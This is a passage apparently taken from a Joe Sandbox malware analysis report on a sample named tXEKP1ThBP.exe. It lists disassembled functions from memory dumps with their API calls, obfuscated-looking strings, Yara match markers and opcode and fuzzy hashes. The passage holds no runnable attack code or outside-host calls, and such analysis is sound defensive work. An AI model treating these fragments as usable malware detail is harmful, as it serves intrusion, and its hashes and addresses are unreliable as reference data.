                                                      • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                                      • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID:
                                                      • API String ID: 3269011525-0
                                                      • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                      • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                                      • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                      • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                                      Function 00410A46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00410A4F
                                                        • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                        • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                      • _free.LIBCMT ref: 00410A62
                                                      • _free.LIBCMT ref: 00410A73
                                                      • _free.LIBCMT ref: 00410A84
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                      • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                                      • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                      • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                                      Function 04CCFE46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                      • Instruction ID: b8c4a12fbfa7ad130722e08011a72ce4441d5c6d312cf3a763c3b404e028df5d
                                                      • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                      • Instruction Fuzzy Hash: 40E0EC71B133209A96326F19FD4044AFF62EBD4B187C9003AE54012631C7762953ABCE
                                                      Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 100067F1
                                                        • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                        • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                      • _free.LIBCMT ref: 10006804
                                                      • _free.LIBCMT ref: 10006815
                                                      • _free.LIBCMT ref: 10006826
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                      • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                      • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                      • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                      Function 04B20CAD Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 04B20CB6
                                                        • Part of subcall function 04B21D29: HeapFree.KERNEL32(00000000,00000000,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?), ref: 04B21D3F
                                                        • Part of subcall function 04B21D29: GetLastError.KERNEL32(?,?,04B272DB,?,00000000,?,?,?,04B27302,?,00000007,?,?,04B275E1,?,?), ref: 04B21D51
                                                      • _free.LIBCMT ref: 04B20CC9
                                                      • _free.LIBCMT ref: 04B20CDA
                                                      • _free.LIBCMT ref: 04B20CEB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                      • Instruction ID: 39b6d081947031b88b02030fd2a8879dc3cb0acb304276bc18d89f086356cbee
                                                      • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                      • Instruction Fuzzy Hash: 6DE0EC79A13334EA96366F18BE40449FF69EBD8B543850076E42812231C7322553ABCE
                                                      Function 0040F8ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                      • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                                      • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                      • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                                      Function 0041017D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                      • API String ID: 0-848213333
                                                      • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                      • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                                      • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                      • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                                      Function 10006038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                      • API String ID: 0-848213333
                                                      • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                      • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                      • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                      • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                      Function 04B203E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                      • API String ID: 0-848213333
                                                      • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                      • Instruction ID: febac3758635e8163154c5fdab2684c83244b26fc54d2cf7936bcd875e342f9b
                                                      • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                      • Instruction Fuzzy Hash: 4C419771A00628AFDB21EF9DDD809AEBBB8EFC5310B1040A6E519D7211E770AA41D754
                                                      Function 04B1AE47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 04B1AE86
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 04B1AF3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 3480331319-1018135373
                                                      • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                      • Instruction ID: 4dc18770f38915a38593e9036af7d627b113eb1bfb49afd72ab84c6aa07a046a
                                                      • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                      • Instruction Fuzzy Hash: CE41F470A01218ABCF10DF68C884A9EBFB5EF08318F5484D5EC18AB3A1D735FA15CB90
                                                      Function 0040B485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                      • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                                      • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                      • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                                      Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                      • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                      • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                      • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                      Function 04B1B6EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 04B1B711
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                      • Instruction ID: 41f0f503442340811f0307959eaaa12e70c0732ec51cb4b5517a374cec95ead0
                                                      • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                      • Instruction Fuzzy Hash: 0A414672900209EFDF15DF98C881AEEBBB5FF48304F5880A9F915AB261D335B950DB50
                                                      Function 00401330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                        • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                      • __Init_thread_footer.LIBCMT ref: 004013BB
                                                        • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                        • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                        • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                      • String ID: FEKN$NE]D
                                                      • API String ID: 2296764815-517842756
                                                      • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                      • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                                      • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                      • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                                      Function 04CC0730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 04CC07BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: FEKN$NE]D
                                                      • API String ID: 1385522511-517842756
                                                      • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                      • Instruction ID: df034a4185dc41f5701bbf8e8623aa6087b07dac4860c4e4db2a706f3326204e
                                                      • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                      • Instruction Fuzzy Hash: 18215A30B00645CBE724DF68E845BA937A1FB45308F94427CD8141B362EBB57685CBD9
                                                      Function 04B11597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B193D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B193E2
                                                        • Part of subcall function 04B193D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B1941F
                                                      • __Init_thread_footer.LIBCMT ref: 04B11622
                                                        • Part of subcall function 04B1938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B19397
                                                        • Part of subcall function 04B1938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B193CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                      • String ID: FEKN$NE]D
                                                      • API String ID: 4132704954-517842756
                                                      • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                      • Instruction ID: e5ada3741179c7ec3cef1a0a7750cda9935554a7ae500b05977a01726066964c
                                                      • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                      • Instruction Fuzzy Hash: C7215C70B00685CBE720CF28E8557A877A0EF99304FE442B5D9141B271E7B63585C7DD
                                                      Function 00407CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                        • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                      • __Init_thread_footer.LIBCMT ref: 00407D2E
                                                        • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                        • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                        • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                      • String ID: CD^O$_DC[
                                                      • API String ID: 2296764815-3597986494
                                                      • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                      • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                                      • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                      • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                                      Function 00407700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                        • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                      • __Init_thread_footer.LIBCMT ref: 0040776E
                                                        • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                        • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                        • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                      • String ID: CD^O$_DC[
                                                      • API String ID: 2296764815-3597986494
                                                      • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                      • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                                      • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                      • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                                      Function 04CC70C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 04CC712E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CD^O$_DC[
                                                      • API String ID: 1385522511-3597986494
                                                      • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                      • Instruction ID: 25a8d2b2e6ead26d0ca473a11fedbd08be56a06660146add2dc74f22de76419d
                                                      • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                      • Instruction Fuzzy Hash: 3E01F431F002059BD720FF69BD409AAB3B5FB48314F98427DD51857240EBB4A9459FEA
                                                      Function 04CC6B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 04CC6B6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CD^O$_DC[
                                                      • API String ID: 1385522511-3597986494
                                                      • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                      • Instruction ID: 078e60ae324809c880ceefd1a962db1d511ab699840d517e4d379add642b4371
                                                      • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                      • Instruction Fuzzy Hash: D7014970F002089BD720FF68AE40669B3B1E704314F80827DD41857250EB7469419BD5
                                                      Function 04B17F27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B193D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B193E2
                                                        • Part of subcall function 04B193D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B1941F
                                                      • __Init_thread_footer.LIBCMT ref: 04B17F95
                                                        • Part of subcall function 04B1938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B19397
                                                        • Part of subcall function 04B1938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B193CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                      • String ID: CD^O$_DC[
                                                      • API String ID: 4132704954-3597986494
                                                      • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                      • Instruction ID: 1c212b8fc6916c53a0ea6aa61581c7f934882d5f6c94448ec30ff8d58c5eb425
                                                      • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                      • Instruction Fuzzy Hash: F7012670B002449BC720EF69BD1099973A4EB44304BD401B9E128472A0DB74A441CBD9
                                                      Function 04B17967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04B193D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B193E2
                                                        • Part of subcall function 04B193D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B1941F
                                                      • __Init_thread_footer.LIBCMT ref: 04B179D5
                                                        • Part of subcall function 04B1938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B19397
                                                        • Part of subcall function 04B1938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B193CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
